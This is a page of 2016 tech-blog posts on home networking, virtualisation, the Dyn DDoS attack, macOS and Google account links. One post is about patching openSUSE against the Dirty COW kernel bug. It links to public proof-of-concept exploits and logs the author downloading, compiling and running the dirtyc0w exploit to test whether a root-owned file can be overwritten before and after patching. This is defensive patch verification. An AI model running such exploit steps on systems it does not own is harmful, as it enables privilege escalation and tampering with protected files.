 | Jeroen Wiert Pluimer… on Does Odido (the old T-Mobile N… |
 | Lars Fosdal on Security alarm provider Woonve… |
 | Thomas Mueller on Question got closed in May 202… |
 | Thaddy de Koning on Formulier voor bewindvoerders… |
| Thaddy de Koning on Formulier voor bewindvoerders… |
Posted by jpluimers on 2016/10/24
Interesting thought:
Devices in a separate LAN (or VLAN) with no default gateway and some firewall rules to access them from your regular LAN and update them through FWUPD an open source firmware update.
Sounds like a dream? We should all make it come true!
Read I don’t have #IoT. I have #LoT. LAN of things. for more ideas.
–jeroen
Posted in IoT Internet of Things, Network-and-equipment, Power User | Leave a Comment »
Posted by jpluimers on 2016/10/24
Gut feeling indicates I need these someday:
From VHD to Proxmox you need to convert to RAW not IMG:
# qemu-img convert -f vpc -O raw PATH/to/DISK.vhd PATH/to/DISK.raw
–jeroen
Posted in Power User, Proxmox, Virtualization | Leave a Comment »
Posted by jpluimers on 2016/10/24
This Plain Text Offenders site lists email screenshots of organisations sending back plain-text passwords they kept on file (According to Robert Love, Idera/Embarcadero should be on the list as well).
It is one of the most horrible things that can be done for a password.
Business and IT do many horrible things, so I really hope someone will start a similar site about SSL Labs F-rated domains. The ones that are so broken that they degraded their https to virtually plain-text http quality.
In the past, a notorious example of this was Embarcadero, who in the past managed to get F-rating or had wrong configurations on the below domains, therefore preventing me from logging in and getting new products from them (which is far worse than them not cleaning up their bug database):
Posted in Delphi, Development, Hashing, https, OpenSSL, Power User, Public Key Cryptography, QC, Security, Signing, Software Development | 3 Comments »
Posted by jpluimers on 2016/10/22
Less than a month after The IoT strikes back: 650 Gigabit/second and 1 Terabit/second attacks by IoT devices within a week the IoT struck back again: an estimated half a million IoT devices was used to perform multiple DDoS attacks against Dyn Managed DNS that took around 11 hours to resolve.
Google DNS appears to “live” near me in Amsterdam
High availability usually involves a mix of DNS TTL and/or BGP routing. That’s typically how CDN providers like Cloudflare work (it’s one of the reasons that global DNS servers like Google’s 8.8.8.8 appear near to you and over time routes – some MPLS – to it change). Short DNS TTL can help CDN, requires a very stable DNS infrastructure and is similar to but different from a Fast Flux network.
Last months attacks were on a security researcher and a single ISP. The Dyn DNS attack affected even more internet services (not just sites like Twitter, WhatsApp, AirBnB and Github). So I’m with Bruce Schneier that Someone Is Learning How to Take Down the Internet.
Handling these attacks is hard as the DDoS mitigation firms simply cannot handle the sudden increase of attack sizes yet. BCP38 should be part of mitigation, but the puzzle is big and fixing it won’t be easy though root-causes of bugs change as a lot of research is in progress.
I’m not alone in expecting it to get worse though before getting better.
On the client side, I learned that many users could cope by changing their DNS servers to either of these Public DNS Servers:
Some more interesting tidbits on the progress and mitigation on this particular attack are the over time heat-maps of affected regions and BGP routing changes below.
Posted in CDN (Content Delivery Network), Cloud, Cloudflare, DNS, Hardware, Infrastructure, Internet, IoT Internet of Things, Network-and-equipment, Opinions, Power User | Leave a Comment »
Posted by jpluimers on 2016/10/21
display – How can I move spaces between external monitors in Mavericks? – Ask Different [WayBack]
You can only move spaces which are non-active.
For example, lets say you have spaces 1 and 2. If space 1 is active, you can not move it. You first have to select space 2 then you can move space 1 to a different monitor.
This helped me work around version 8.35 of Microsoft Remote Desktop for OS X breaks second monitor usage [WayBack]:
Sometimes the primary monitor doesn’t have a non-active space any more so you have to create a new one in the top right of Mission Control [WayBack].
–jeroen
Posted in Apple, Mac, Mac OS X / OS X / MacOS, MacBook, MacBook Retina, MacBook-Pro, OS X 10.9 Mavericks, Power User, Remote Desktop Protocol/MSTSC/Terminal Services, Windows | Leave a Comment »
Posted by jpluimers on 2016/10/21
There is a nasty (Dirty COW: CVE-2016-5195) Linux kernel bug with zero-day exploits floating around
OpenSuSE updates will be available soon (likely this weekend); from the #openSUSE-factory IRC channel :
wiert: any E.T.A. for CVE-2016-5195 in the various releases?
…_Marcus_: 13.1 and 42.1 i just released. 13.2 submission i am still awaiting, so release likely tomorrow
…wiert: How about Tumbleweed?
…DimStar: for TW, I have it in staging and will try to squeeze it into the 1021 snapshot
so unlike something really bad happened, it should be shipping tomorrow or Sunday
via: How To Patch and Protect Linux Kernel Zero Day Local Privilege Escalation Vulnerability CVE-2016-5195 [ 21/Oct/2016 ] [WayBack]
Progress can be tracked at https://bugzilla.suse.com/show_bug.cgi?id=CVE-2016-5195 (via simotek a.k.a. Simon Lees at IRC). Hopefully 13.2 will get released on Monday.
Edit: 13.2 didn’t make it on monday. Progress can be found via https://build.opensuse.org/project/maintenance_incidents/openSUSE:Maintenance (slow loading page!) and is at https://build.opensuse.org/project/show/openSUSE:Maintenance:5752
More exploits at https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
–jeroen
Testing 13.2:
# zypper addrepo http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/openSUSE:Maintenance:5752.repo # zypper patch
This works fine in await of the formal update process and me testing it resulted in the release of the kernel to the official 13.2 update, but note you still have to reboot after the update even though the process doesn’t tell you that:
wiert: @_Marcus_ “klopt als een zwerende vinger” or in English: works splendid. install and test log at https://gist.github.com/jpluimers/42694ab1df04ea1bc8433ae021f9ef7e wiert: @_Marcus_ thanks about teaching me about `zypper patch`. Need to run for the fundraising event now. _Marcus_: wiert: thanks :) wiert: @_Marcus_ no problem. Given the work you guys (and gals?) do it’s a small thing with the added bonus of contributing to my motto “life is about learning new things every day”. _Marcus_: after your feedback i have now released the kenel ;) wiert: @_Marcus_ great, looking forward to the actual update later. Thanks a lot! wiert: @_Marcus_ I’ve updated the gist: 13.2 plus official dirty-COW update needs reboot, but the update process doesn’t list about reboot. Didn’t get the full zypper output, but I after updating I did a before/after reboot comparison of the behaviour. Results in https://gist.github.com/jpluimers/42694ab1df04ea1bc8433ae021f9ef7e#file-testing-official-update-before-reboot-then-reboot-retest-txt
| # zypper addrepo http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/openSUSE:Maintenance:5752.repo | |
| Adding repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' ……………………………………………………………………………………………………………………………………………………………………………..[done] | |
| Repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' successfully added | |
| Enabled : Yes | |
| Autorefresh : No | |
| GPG Check : Yes | |
| URI : http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/ | |
| # zypper patch | |
| New repository or package signing key received: | |
| Repository: openSUSE:Maintenance:5752 (openSUSE_13.2_Update) | |
| Key Name: openSUSE:Maintenance OBS Project <openSUSE:Maintenance@build.opensuse.org> | |
| Key Fingerprint: 7C097045 B0D351D3 69AC453A 598D0E63 B3FD7E48 | |
| Key Created: Thu Aug 6 11:49:53 2015 | |
| Key Expires: Sat Oct 14 11:49:53 2017 | |
| Rpm Name: gpg-pubkey-b3fd7e48-55c32dc1 | |
| Do you want to reject the key, trust temporarily, or trust always? [r/t/a/? shows all options] (r): t | |
| Building repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' cache ………………………………………………………………………………………………………………………………………………………………………[done] | |
| Loading repository data… | |
| Reading installed packages… | |
| Resolving package dependencies… | |
| The following NEW package is going to be installed: | |
| kernel-default-3.16.7-45.1 | |
| The following NEW patch is going to be installed: | |
| 5752 | |
| 1 new package to install. | |
| Overall download size: 45.2 MiB. Already cached: 0 B After the operation, additional 213.5 MiB will be used. | |
| Continue? [y/n/? shows all options] (y): y | |
| Retrieving package kernel-default-3.16.7-45.1.x86_64 (1/1), 45.2 MiB (213.5 MiB unpacked) | |
| Retrieving: kernel-default-3.16.7-45.1.x86_64.rpm ……………………………………………………………………………………………………………………………………………………………………………………[done (3.6 MiB/s)] | |
| Checking for file conflicts: …………………………………………………………………………………………………………………………………………………………………………………………………………………[done] | |
| (1/1) Installing: kernel-default-3.16.7-45.1 …………………………………………………………………………………………………………………………………………………………………………………………………..[done] | |
| Additional rpm output: | |
| warning: /var/cache/zypp/packages/openSUSE_Maintenance_5752/x86_64/kernel-default-3.16.7-45.1.x86_64.rpm: Header V3 RSA/SHA256 Signature, key ID b3fd7e48: NOKEY | |
| Creating initrd: /boot/initrd-3.16.7-45-default | |
| Executing: /usr/bin/dracut –logfile /var/log/YaST2/mkinitrd.log –force /boot/initrd-3.16.7-45-default 3.16.7-45-default | |
| dracut module 'plymouth' will not be installed, because command 'plymouthd' could not be found! | |
| dracut module 'plymouth' will not be installed, because command 'plymouth' could not be found! | |
| dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found! | |
| dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found! | |
| dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found! | |
| dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found! | |
| dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found! | |
| dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found! | |
| *** Including module: bash *** | |
| *** Including module: warpclock *** | |
| *** Including module: i18n *** | |
| *** Including module: ifcfg *** | |
| *** Including module: btrfs *** | |
| *** Including module: kernel-modules *** | |
| Failed to install module sd_mod | |
| Failed to install module unix | |
| Failed to install module atkbd | |
| Failed to install module i8042 | |
| Omitting driver i2o_scsi | |
| Failed to install module swap | |
| *** Including module: resume *** | |
| *** Including module: rootfs-block *** | |
| *** Including module: terminfo *** | |
| *** Including module: udev-rules *** | |
| Skipping udev rule: 91-permissions.rules | |
| Skipping udev rule: 80-drivers-modprobe.rules | |
| *** Including module: systemd *** | |
| Failed to install module autofs4 | |
| Failed to install module ipv6 | |
| *** Including module: usrmount *** | |
| *** Including module: base *** | |
| *** Including module: fs-lib *** | |
| *** Including module: shutdown *** | |
| *** Including module: suse *** | |
| *** Including modules done *** | |
| *** Installing kernel module dependencies and firmware *** | |
| *** Installing kernel module dependencies and firmware done *** | |
| *** Resolving executable dependencies *** | |
| *** Resolving executable dependencies done*** | |
| *** Hardlinking files *** | |
| *** Hardlinking files done *** | |
| *** Stripping files *** | |
| *** Stripping files done *** | |
| *** Generating early-microcode cpio image *** | |
| *** Constructing GenuineIntel.bin **** | |
| *** Store current command line parameters *** | |
| Stored kernel commandline: | |
| resume=UUID=abc2d6ec-f332-4788-8f30-c4c16e20d80b | |
| root=UUID=6d56201f-f95c-403b-9652-c5fe8833f3ca rootflags=rw,relatime,space_cache rootfstype=btrfs | |
| *** Creating image file *** | |
| *** Creating image file done *** | |
| Some kernel modules could not be included | |
| This is not necessarily an error: | |
| sd_mod | |
| unix | |
| atkbd | |
| i8042 | |
| swap | |
| autofs4 | |
| ipv6 | |
| Update bootloader… | |
| Warning: One of installed patches requires reboot of your machine. Reboot as soon as possible. | |
| # reboot |
| (1/3) Installing: kernel-default-3.16.7-45.1 ……………………………………………………………………………………………….[done] | |
| Additional rpm output: | |
| Creating initrd: /boot/initrd-3.16.7-45-default | |
| Executing: /usr/bin/dracut –logfile /var/log/YaST2/mkinitrd.log –force /boot/initrd-3.16.7-45-default 3.16.7-45-default | |
| dracut module 'plymouth' will not be installed, because command 'plymouthd' could not be found! | |
| dracut module 'plymouth' will not be installed, because command 'plymouth' could not be found! | |
| dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found! | |
| dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found! | |
| dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found! | |
| dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found! | |
| dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found! | |
| dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found! | |
| *** Including module: bash *** | |
| *** Including module: warpclock *** | |
| *** Including module: i18n *** | |
| *** Including module: ifcfg *** | |
| *** Including module: btrfs *** | |
| *** Including module: kernel-modules *** | |
| Failed to install module sd_mod | |
| Failed to install module unix | |
| Failed to install module atkbd | |
| Failed to install module i8042 | |
| Omitting driver i2o_scsi | |
| Failed to install module swap | |
| *** Including module: resume *** | |
| *** Including module: rootfs-block *** | |
| *** Including module: terminfo *** | |
| *** Including module: udev-rules *** | |
| Skipping udev rule: 91-permissions.rules | |
| Skipping udev rule: 80-drivers-modprobe.rules | |
| *** Including module: systemd *** | |
| Failed to install module autofs4 | |
| Failed to install module ipv6 | |
| *** Including module: usrmount *** | |
| *** Including module: base *** | |
| *** Including module: fs-lib *** | |
| *** Including module: shutdown *** | |
| *** Including module: suse *** | |
| *** Including modules done *** | |
| *** Installing kernel module dependencies and firmware *** | |
| *** Installing kernel module dependencies and firmware done *** | |
| *** Resolving executable dependencies *** | |
| *** Resolving executable dependencies done*** | |
| *** Hardlinking files *** | |
| *** Hardlinking files done *** | |
| *** Stripping files *** | |
| *** Stripping files done *** | |
| *** Generating early-microcode cpio image *** | |
| *** Constructing GenuineIntel.bin **** | |
| *** Store current command line parameters *** | |
| Stored kernel commandline: | |
| resume=UUID=abc2d6ec-f332-4788-8f30-c4c16e20d80b | |
| root=UUID=6d56201f-f95c-403b-9652-c5fe8833f3ca rootflags=rw,relatime,space_cache rootfstype=btrfs | |
| *** Creating image file *** | |
| *** Creating image file done *** | |
| Some kernel modules could not be included | |
| This is not necessarily an error: | |
| sd_mod | |
| unix | |
| atkbd | |
| i8042 | |
| swap | |
| autofs4 | |
| ipv6 | |
| Update bootloader… | |
| (2/3) Installing: ghostscript-9.15-6.1 …………………………………………………………………………………………………….[done] | |
| (3/3) Installing: ghostscript-x11-9.15-6.1 …………………………………………………………………………………………………[done] |
| $ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c | |
| $ gcc -lpthread dirtyc0w.c -o dirtyc0w | |
| $ sudo su – | |
| # echo this is not a test > foo | |
| # cat foo | |
| this is not a test | |
| # logout | |
| $ ./dirtyc0w foo m00000000000000000 | |
| mmap ffffffffffffffff | |
| madvise -100000000 | |
| procselfmem -100000000 | |
| $ cat foo | |
| cat: foo: No such file or directory | |
| $ sudo su – | |
| # cat foo | |
| this is not a test | |
| # logout |
| $ cd /tmp/ | |
| $ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c | |
| $ gcc -lpthread dirtyc0w.c -o dirtyc0w | |
| $ sudo su – | |
| # echo this is not a test > foo | |
| # cat foo | |
| this is not a test | |
| # logout | |
| $ ./dirtyc0w foo m00000000000000000 | |
| mmap 7f6ab7207000 | |
| madvise 0 | |
| procselfmem 1800000000 | |
| $ cat foo | |
| m00000000000000000 | |
| $ sudo su – | |
| # reboot | |
| login | |
| $ cd /tmp/ | |
| $ sudo su – | |
| # cat foo | |
| this is not a test | |
| # logout | |
| $ ./dirtyc0w foo m00000000000000000 | |
| mmap 7f5465983000 | |
| madvise 0 | |
| procselfmem 1800000000 | |
| $ cat foo | |
| this is not a test |
Posted in *nix, openSuSE, Power User, SuSE Linux, Tumbleweed | Leave a Comment »
Posted by jpluimers on 2016/10/21
Not sure why yet, but on a gigabit network between a Windows 2008 R2 Server and a Proxmox KVM machine, WinSCP gets around 10 megabit/second and FileZilla > 30 megabit/second.
Others seem to agree that filezilla faster than winscp.
–jeroen
Posted in Communications Development, Development, Internet protocol suite, Power User, Proxmox, SSH, TCP, Virtualization, VMware, Windows, Windows Server 2008, Windows Server 2008 R2 | 1 Comment »
Posted by jpluimers on 2016/10/21
Below a table with clickable links, details are in the Via at the end. I added some more beyond the 10 original ones.
# URL What Footer 1 Footer 2 Footer 3 1 https://accounts.google.com/SignUpWithoutGmail Get a new account 2 https://www.google.com/ads/preferences Manage advertisement profile 3 https://www.google.com/takeout Download your Google data (mail can take days!) 4 https://support.google.com/legal To file a complaint about using copyrighted or unpermissioned material 5 https://maps.google.com/locationhistory Shows where your devices have been 6 https://history.google.com All your searches 7 https://www.google.com/settings/account/inactive Prevent extended inactivity, Google doesn’t delete your account after 9 months. 8 https://security.google.com/settings/security/activity When you suspect account abuse 9 https://security.google.com/settings/security/permissions Set permissions of apps and sites relating to your account 10 https://admin.google.com/example.org/VerifyAdminAccountPasswordReset Apps users: reset admin account by adding a CNAME to the DNS 11 https://plus.google.com G+ / Google Plus 12 https://plus.google.com/hangouts Google Hangouts 13 https://gmail.com GMail / Google Mail 14 https://contacts.google.com Google Contacts (note + button to add is hidden behind Hangouts pop-up also on the lower right) 15 https://calendar.google.com Calendar / Agenda 16 https://www.google.com/sync Sync Google Settings between various devices / applications 17 https://myaccount.google.com Account and privacy settings 18 https://myaccount.google.com/security Security settings like two-factor authentication (2-step signin) 19 https://security.google.com/settings/security/secureaccount Check if your security settings (recovery phone, recovery email, security question) are still up to date. 20 https://myaccount.google.com/privacycheckup/1 Setting your privacy 21 https://wallet.google.com Manage Wallet 22 https://play.google.com Google Play Store and settings 23 https://www.google.com/android/devicemanager Where is your Android device # href what # href what # href what # href what # href what # href what # href what # href what # href what # href what # href what
–jeroen
via: Some Imporatant URLs you should know as a Google User – I am Programmer.
Posted in GMail, Google, Power User | Leave a Comment »
Posted by jpluimers on 2016/10/20
I will probably need this in the future as occasionally I still do Delphi work:
–jeroen
Posted in Delphi, Delphi 2006, Delphi 7, Development, Software Development | 2 Comments »
Posted by jpluimers on 2016/10/20
The unix shell is hard, but boy, sometimes it can work like magic, for instance piping two testssl.sh commands into one gist:
retinambpro1tb:testssl.sh jeroenp$ ( ./testssl.sh --version ; ./testssl.sh --local ) | gist -d "testsll version and local ciphers for Mac OS X Darwin binarries supporting zlib"
https://gist.github.com/701496d7fbf929967aa1
The source of this magic was this AskUbuntu answer: How to merge and pipe results from two different commands to single command? – Ask Ubuntu
–jeroen
via: openssl.Darwin.x86_64 lacks zlib support · Issue #164 · drwetter/testssl.sh
Posted in *nix, *nix-tools, bash, bash, Development, Power User, Scripting, Software Development, Uncategorized | Leave a Comment »
The Wiert Corner - irregular stream of stuff 